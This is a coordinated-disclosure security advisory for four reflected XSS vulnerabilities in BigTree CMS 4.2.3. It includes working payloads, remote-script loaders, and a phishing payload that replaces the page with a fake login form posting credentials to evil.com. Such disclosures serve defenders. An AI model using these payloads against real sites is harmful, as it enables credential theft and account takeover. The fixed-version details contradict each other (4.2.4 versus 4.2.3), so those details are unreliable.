BigTree CMS 4.2.3 Cross Site Scripting

`BigTree CMS 4.2.3: Multiple Cross Site Scripting Vulnerabilities  
Security Advisory – Curesec Research Team  
  
Online Reference:  
http://blog.curesec.com/article/blog/BigTree-CMS-423-Multiple-Cross-Site-Scripting-Vulnerabilities-38.html  
  
1. Introduction  
  
Affected Product: BigTree CMS 4.2.3   
Fixed in: 4.2.4  
Fixed Version Link:  
https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip   
Vendor Contact: [email protected]   
Vulnerability Type: Multiple Reflected XSS   
Remote Exploitable: Yes   
Reported to vendor: 07/07/2015   
Disclosed to public: 08/07/2015   
Release mode: Coordinated release   
CVE: n/a   
Credits Tim Coen of Curesec GmbH   
  
2. Vulnerability Description  
  
Various components of the BigTree CMS are vulnerable to cross site  
scripting. With this, it is possible to inject and execute arbitrary  
JavaScript code. This can for example be used by an attacker to inject a  
JavaScript keylogger or perform phishing attacks.  
  
Please find attached three XSS attacks exploitable via GET, and one  
exploitable via POST requests. The attacks using GET requests can be  
exploited by getting the victim to click a link or visit an attacker  
controlled website. The attack using a POST request requires the victim  
to visit an attacker controlled website.  
XSS 1 (via POST)  
  
The script that processes Ajax requests for the file browser does not  
properly sanitize the "file" parameter, opening it up to reflected XSS.  
  
Sample POC:  
  
<form  
action="http://localhost/BigTree-CMS/core/admin/ajax/developer/extensions/file-browser.php"  
method="post" name="myform">  
<input type="hidden" name="cloud_disabled" value="true" />  
<input type="hidden" name="file" value=""><script>alert(1)</script>" />  
<input type="submit" value="Create" />  
</form>  
<script>document.myform.submit();</script>  
  
Payload to load a remote script:  
  
"><script src='http://localhost/s.js'></script>  
  
Code:  
  
core/admin/ajax/developer/extensions/file-browser.php:127:  
<input type="hidden" name="file" id="bigtree_foundry_file"  
value="<?=$_POST["file"]?>" />  
XSS 2 (via GET)  
  
The script that processes Ajax requests for the integrity check does not  
properly sanitize the "id" parameter, opening it up to reflected XSS.  
  
Limitations: Single and double quotes are escaped.  
  
Sample POC:  
  
http://localhost/BigTree-CMS/site/index.php/admin/ajax/dashboard/integrity-check/module?table=1&id=<script>alert(1)</script>  
  
Loading a remote script:  
  
http://localhost/BigTree-CMS/site/index.php/admin/ajax/dashboard/integrity-check/module?table=1&id=<script  
src=http://localhost/s.js></script>  
  
Code:  
  
core/admin/ajax/dashboard/integrity-check/module.php:31:  
<a  
href="<?=ADMIN_ROOT.$module["route"]."/".$action["route"]."/".$_GET["id"]?>/"  
  
XSS 3 (via GET)  
  
The script that processes page view requests does not properly sanitize  
the "id" value that is given in the URL, thus opening it up to reflected  
XSS.  
  
Limitations: forward slash cannot be used  
Sample POC:  
  
  
http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/'"><img src="%23"  
onerror="alert('xsstest')">  
Loading a remote script:  
  
http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/'"><img src="%23"  
onerror="s=document.createElement('script');s.src='\x2F\x2Flocalhost\x2Fs.js';document.body.appendChild(s);">  
  
Code:  
  
The input is echoed in multiple places:  
  
core/admin/modules/pages/_properties.php:54  
<p><?=$page["id"]?></p>  
core/admin/modules/pages/_properties.php:70  
<p><a href="<?=$preview_url?>"  
target="_blank"><?=$preview_url?></a></p>  
core/admin/layouts/default.php:153  
<a  
href="<?=ADMIN_ROOT.$item["link"]?>/<?=htmlspecialchars(rtrim($get_string,"&"))?>"<?  
if ($active_item == $item) { ?>  
XSS 4 (via GET)  
  
The "id" value described in the previous section is additionally echoed  
inside script tags, opening it up to a further XSS injection.  
  
Limitations: forward slash cannot be used and single and double quotes  
are escaped.  
Simple POC:  
  
  
http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/xsstest",  
}});}});alert(1);$("%23pages_pages").sortable({ axis: "y", containment:  
"parent", handle: ".icon_sort", items: "li", placeholder:  
"ui-sortable-placeholder", tolerance: "pointer", update: function()  
{$.ajax("", { type: "POST", data: { id: "  
  
Code:  
  
core/admin/modules/pages/_nav-tree.php:138  
<script>  
$("#pages_<?=$class?>").sortable({ axis: "y", containment:  
"parent", handle: ".icon_sort", items: "li", placeholder:  
"ui-sortable-placeholder", tolerance: "pointer", update: function() {  
$.ajax("<?=ADMIN_ROOT?>ajax/pages/order/", { type: "POST",  
data: { id: "<?=$page["id"]?>", sort:  
$("#pages_<?=$class?>").sortable("serialize") } });  
}});  
</script>  
  
3. Proof of Concept Codes:  
  
3.1 Example Phishing Site:  
  
The attack can for example be used for phishing, by displaying the login  
page and sending the data submitted by the victim to an attacker  
controlled server.  
  
var payload = document.createElement('div');  
payload.innerHTML = "  
<!doctype html>  
<head>  
<meta charset="utf-8">  
<meta name="robots" content="noindex,nofollow" />  
<title>Trees of All Sizes Login</title>  
<link rel="stylesheet"  
href="//localhost/BigTree-CMS-master/site/index.php/admin/css/main.css"  
type="text/css" media="screen" charset="utf-8" />  
<script  
src="//localhost/BigTree-CMS-master/site/index.php/admin/js/lib.js"></script>  
<script  
src="//localhost/BigTree-CMS-master/site/index.php/admin/js/main.js"></script>  
</head>  
<body class="login">  
<div class="login_wrapper">  
<h1>Trees of All Sizes</h1>  
<form method="post" action="http:/evil.com/log.php" class="module">  
<fieldset>  
<label>Email</label>  
<input type="email" id="user" name="user" class="text" value="" />  
</fieldset>  
<fieldset>  
<label>Password</label>  
<input type="password" id="password" name="password" class="text" />  
<p><input type="checkbox" name="stay_logged_in" checked="checked" />  
Remember Me</p>  
</fieldset>  
<fieldset class="lower">  
<a  
href="http://localhost/BigTree-CMS-master/site/index.php/admin/login/forgot-password/"  
class="forgot_password">Forgot Password?</a>  
<input type="submit" class="button blue" value="Login" />  
</fieldset>  
</form>   
<a href="http://www.bigtreecms.com" class="login_logo"  
target="_blank"></a>  
<span class="login_copyright">  
Version 4.2.3 · © 2015 <a href="http://www.fastspot.com"  
target="_blank"> Fastspot</a>  
</span>  
</div>  
</body>  
</html>  
";  
document.replaceChild(payload, document.documentElement);  
  
4. Solution  
  
To mitigate this issue please upgrade at least to version 4.2.3:  
  
https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip  
  
Please note that a newer version might already be available.  
  
5. Report Timeline  
  
07/07/2015 Informed Vendor about Issue  
07/08/2015 Vendor send Fixes for confirmation  
07/10/2015 Fixes Confirmed  
07/26/2015 Vendor releases Version 4.2.3  
08/07/2015 Disclosed to public  
  
  
  
  
  
`